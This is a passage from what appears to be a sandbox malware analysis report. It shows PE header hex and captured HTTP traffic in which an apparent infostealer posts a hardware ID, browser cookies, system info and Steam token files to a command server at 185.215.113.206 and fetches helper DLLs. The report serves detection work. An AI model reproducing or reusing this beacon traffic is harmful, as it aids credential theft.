40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 66 62 6d 75 6e 66 63 00 80 2b 00 00 a0 00 00 00 6e 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 71 78 68 68 71 78 79 00 20 00 00 00 20 2c 00 00 06 00 00 00 a8 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2c 00 00 22 00 00 00 ae 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKEBGIIDAFIDHIIECFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 30 45 43 33 35 30 44 46 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="hwid"A00EC350DF1F1622379703------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="build"mars------CBAKEBGIIDAFIDHIIECF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEGHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 2d 2d 0d 0a Data Ascii: ------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="message"browsers------DAEBFHJKJEBFCBFHDAEG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 2d 2d 0d 0a Data Ascii: ------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="message"plugins------JEBKJDAFHJDGDHJKKEGI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKJDAEBFCBKECBGDBFCHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 2d 2d 0d 0a Data Ascii: ------JJKJDAEBFCBKECBGDBFCContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------JJKJDAEBFCBKECBGDBFCContent-Disposition: form-data; name="message"fplugins------JJKJDAEBFCBKECBGDBFC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDBHost: 185.215.113.206Content-Length: 5819Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDBHost: 185.215.113.206Content-Length: 5819Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 6c 7a 64 47 56 74 58 32 6c 75 5a 6d 38 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 48 43 41 41 4b 45 43 47 43 42 46 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 43 6b 35 6c 64 48 64 76 63 6d 73 67 53 57 35 6d 62 7a 6f 4b 43 53 30 67 53 56 41 36 49 45 6c 51 50 77 6f 4a 4c 53 42 44 62 33 56 75 64 48 4a 35 4f 69 42 4a 55 30 38 2f 43 67 70 54 65 58 4e 30 5a 57 30 67 55 33 56 74 62 57 46 79 65 54 6f 4b 43 53 30 67 53 46 64 4a 52 44 6f 67 51 54 41 77 52 55 4d 7a 4e 54 42 45 52 6a 46 47 4d 54 59 79 4d 6a 4d 33 4f 54 63 77 4d 77 6f 4a 4c 53 42 50 55 7a 6f 67 56 32 6c 75 5a 47 39 33 63 79 41 78 4d 43 42 51 63 6d 38 4b 43 53 30 67 51 58 4a 6a 61 47 6c 30 5a 57 4e 30 64 58 4a 6c 4f 69 42 34 4e 6a 51 4b 43 53 30 67 56 58 4e 6c 63 6b 35 68 62 57 55 36 49 47 46 73 5a 6d 39 75 63 77 6f 4a 4c 53 42 44 62 32 31 77 64 58 52 6c 63 69 42 4f 59 57 31 6c 4f 69 41 34 4f 54 6b 31 4e 54 49 4b 43 53 30 67 54 47 39 6a 59 57 77 67 56 47 6c 74 5a 54 6f 67 4d 6a 41 79 4e 43 38 78 4d 53 38 78 4d 69 41 77 4f 6a 49 7a 4f 6a 4d 4b 43 53 30 67 56 56 52 44 4f 69 41 74 4e 51 6f 4a 4c 53 42 4d 59 57 35 6e 64 57 46 6e 5a 54 6f 67 5a 57 34 74 51 30 67 4b 43 53 30 67 53 32 56 35 59 6d 39 68 63 6d 52 7a 4f 69 42 46 62 6d 64 73 61 58 4e 6f 49 43 68 56 62 6d 6c 30 5a 57 51 67 53 32 6c 75 5a 32 52 76 62 53 6b 67 4c 79 42 46 62 6d 64 73 61 58 4e 6f 49 43 68 56 62 6d 6c 30 5a 57 51 67 53 32 6c 75 5a 32 52 76 62 53 6b 4b 43 53 30 67 54 47 46 77 64 47 39 77 4f 69 42 47 51 55 78 54 52 51 6f 4a 4c 53 42 53 64 57 35 75 61 57 35 6e 49 46 42 68 64 47 67 36 49 45 4d 36 58 46 56 7a 5a 58 4a 7a 58 47 46 73 5a 6d 39 75 63 31 78 45 5a 58 4e 72 64 47 39 77 58 47 5a 70 62 47 55 75 5a 58 68 6c 43 67 6b 74 49 45 4e 51 56 54 6f 67 53 57 35 30 5a 57 77 6f 55 69 6b 67 51 32 39 79 5a 53 68 55 54 53 6b 79 49 45 4e 51 56 53 41 32 4e 6a 41 77 49 45 41 67 4d 69 34 30 4d 43 42 48 53 48 6f 4b 43 53 30 67 51 32 39 79 5a 58 4d 36 49 44 49 4b 43 53 30 67 56 47 68 79 5a 57 46 6b 63 7a 6f 67 4e 41 6f 4a 4c 53 42
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAFHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 2d 2d 0d 0a Data Ascii: ------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------BAFBFCBGHDGCFHJJECAF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGCHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 2d 2d 0d 0a Data Ascii: ------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="file"------DBFCBGCGIJKJKECAKEGC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGIHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGDBFCBKFIDHIDHDHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 2d 2d 0d 0a Data Ascii: ------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="file"------JKECGDBFCBKFIDHIDHDH--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFIHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHCBGDHIEBFHCBFHDHDHContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------DHCBGDHIEBFHCBFHDHDHContent-Disposition: form-data; name="message"wallets------DHCBGDHIEBFHCBFHDHDH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDBHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 2d 2d 0d 0a Data Ascii: ------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="message"files------BGIDBKKKKKFBGDGDHIDB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCGHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 43 42 41 46 42 46 48 49 49 45 43 42 4b 46 43 47 2d 2d 0d 0a Data Ascii: ------JEGHCBAFBFHIIECBKFCGContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------JEGHCBAFBFHIIECBKFCGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JEGHCBAFBFHIIECBKFCGContent-Disposition: form-data; name="file"------JEGHCBAFBFHIIECBKFCG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCGIJDHDGDBGDGCGCFHHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 